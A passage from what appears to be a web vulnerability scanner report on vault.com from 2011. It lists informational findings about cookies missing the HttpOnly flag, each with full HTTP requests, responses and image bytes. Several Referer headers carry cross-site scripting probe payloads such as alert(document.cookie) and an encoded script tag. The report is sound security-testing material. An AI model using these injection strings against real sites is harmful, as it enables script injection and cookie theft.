Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 05 Aug 2010 14:27:55 GMT
ETag: "b4b53a-2e84-5b2730c0"
Accept-Ranges: bytes
Content-Length: 11908
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:14 GMT;path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2010:05:25 14:22:05.........
...[SNIP]...

10.165. http://www.vault.com/images/icons/join-books.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/join-books.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/join-books.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:21:50 GMT
ETag: "b484ce-2612-75064b80"
Accept-Ranges: bytes
Content-Length: 9746
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

.PNG
.
...IHDR.......v......L......tEXtSoftware.Adobe ImageReadyq.e<....PLTE...NNM.i$..8rmOM....... /'.i\2 &S.y7
..onm..&...+..........
.    -n.uh9%("...Oq..uN.........1..DT&68'g......%%.MsRc...NJ6,..
...[SNIP]...

10.166. http://www.vault.com/images/icons/print-y.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/print-y.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/print-y.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:42 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:49:38 GMT
ETag: "10a0011-11d-f1edc880"
Accept-Ranges: bytes
Content-Length: 285
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:46 GMT;path=/

.PNG
.
...IHDR..............<......tEXtSoftware.Adobe ImageReadyq.e<...0PLTE..n.........rrt........7.........................P......IDATx...... .E1..4..oS......s.0........~...V.D....6F|7&.roL>bo...x
...[SNIP]...

10.167. http://www.vault.com/images/icons/print.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/print.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/print.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:30:18 GMT
ETag: "10a0010-118-acc99680"
Accept-Ranges: bytes
Content-Length: 280
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/

.PNG
.
...IHDR..............<......tEXtSoftware.Adobe ImageReadyq.e<...0PLTE1u....U..lln............u...........{{}...........W@...~IDATx...Q.. ..E..E..m.Zmj.&..A.<B..5....P..!..B../z..2...&...s....
...[SNIP]...

10.168. http://www.vault.com/images/icons/share-y.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/share-y.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/share-y.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:42 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:28:18 GMT
ETag: "10a000b-17a-a5a28880"
Accept-Ranges: bytes
Content-Length: 378
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:45 GMT;path=/

.PNG
.
...IHDR.............q.>.....tEXtSoftware.Adobe ImageReadyq.e<...`PLTE..H.....-...........q........_..5.........................................
..`........V.................IDATx.l.... .E....
...[SNIP]...

10.169. http://www.vault.com/images/icons/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/share.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/share.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:28:19 GMT
ETag: "10a000c-18f-a5b1cac0"
Accept-Ranges: bytes
Content-Length: 399
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:14 GMT;path=/

.PNG
.
...IHDR.............q.>.....tEXtSoftware.Adobe ImageReadyq.e<...`PLTE...+r..........Dw./t.6q....'n....H..b..:v....R..Z........n.....5y..g.B.....e|.A.<}.v.....1v.......e....IDATx.l.... ..P.D.
...[SNIP]...

10.170. http://www.vault.com/images/overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/overlay.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/overlay.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:04 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 01 Oct 2009 19:29:03 GMT
ETag: "ae00d7-6d-a8f77dc0"
Accept-Ranges: bytes
Content-Length: 109
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:08 GMT;path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b```...`.............IEND.B`.

10.171. http://www.vault.com/images/rankings_tab.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/rankings_tab.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/rankings_tab.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 07 Jul 2010 18:23:01 GMT
ETag: "ae0346-1cc-4289cb40"
Accept-Ranges: bytes
Content-Length: 460
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................J..
...[SNIP]...

10.172. http://www.vault.com/images/search/select-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/search/select-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/search/select-bg.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Feb 2010 14:00:37 GMT
ETag: "16f0001-541-4656eb40"
Accept-Ranges: bytes
Content-Length: 1345
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

GIF89ae..............................................................................nhZ.........................................................sk^...............sja......{sf.........................
...[SNIP]...

10.173. http://www.vault.com/images/sections_background.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sections_background.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sections_background.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 22 Jul 2010 12:42:48 GMT
ETag: "ae0353-13b-4172c200"
Accept-Ranges: bytes
Content-Length: 315
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:14 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.174. http://www.vault.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Aug 2009 13:53:19 GMT
ETag: "ae0093-2b-17a751c0"
Accept-Ranges: bytes
Content-Length: 43
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

GIF89a.............!.......,...........D..;

10.175. http://www.vault.com/images/sponsors/schools/sponsor_1088.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_1088.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_1088.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:24:27 GMT
ETag: "b48746-72f-7e61ecc0"
Accept-Ranges: bytes
Content-Length: 1839
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H.....................................vvveeeOOO///...!.......,......H......I..8....`(.di.h..l;..#/.Rl.#;c.....8....b#p<~.GBH.b....A.$...b....fg7a......l@.m.<.....
nD..K.h..|M..........j.z..
...[SNIP]...

10.176. http://www.vault.com/images/sponsors/schools/sponsor_1398.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_1398.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_1398.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Jul 2009 17:57:29 GMT
ETag: "b4874c-5eb-5b257440"
Accept-Ranges: bytes
Content-Length: 1515
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H..........#. 1-.?;<LIJZWXhefvst.....w....................n.....................................................................................................................................
...[SNIP]...

10.177. http://www.vault.com/images/sponsors/schools/sponsor_1727.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_1727.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_1727.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 24 Aug 2010 19:47:08 GMT
ETag: "b48735-1745-7bee700"
Accept-Ranges: bytes
Content-Length: 5957
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H..........\s.Th.D].Ni.m..g}.u..y.....}........Bc.Fh.Mk.Up.e..\u.c{.s..p..{..x...........=Z.[z.`}.`}.d..i..j..n..v..`w.|.....u..x..{..~...........~.............................Fj.Ce.Nr.<W.Hf.S
...[SNIP]...

10.178. http://www.vault.com/images/sponsors/schools/sponsor_2105.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_2105.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_2105.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 21:47:58 GMT
ETag: "b48750-7a8-5636ff80"
Accept-Ranges: bytes
Content-Length: 1960
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H........U!.........F.i....\,...*yQ..........d3p.....!.......,......H......I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z..    xL.....8.n...5|N..%..~/...i}R........t.    .....    f...`..
...[SNIP]...

10.179. http://www.vault.com/images/sponsors/schools/sponsor_2282.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_2282.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_2282.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 17 Jul 2009 11:35:36 GMT
ETag: "b4873f-332-2fd69200"
Accept-Ranges: bytes
Content-Length: 818
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
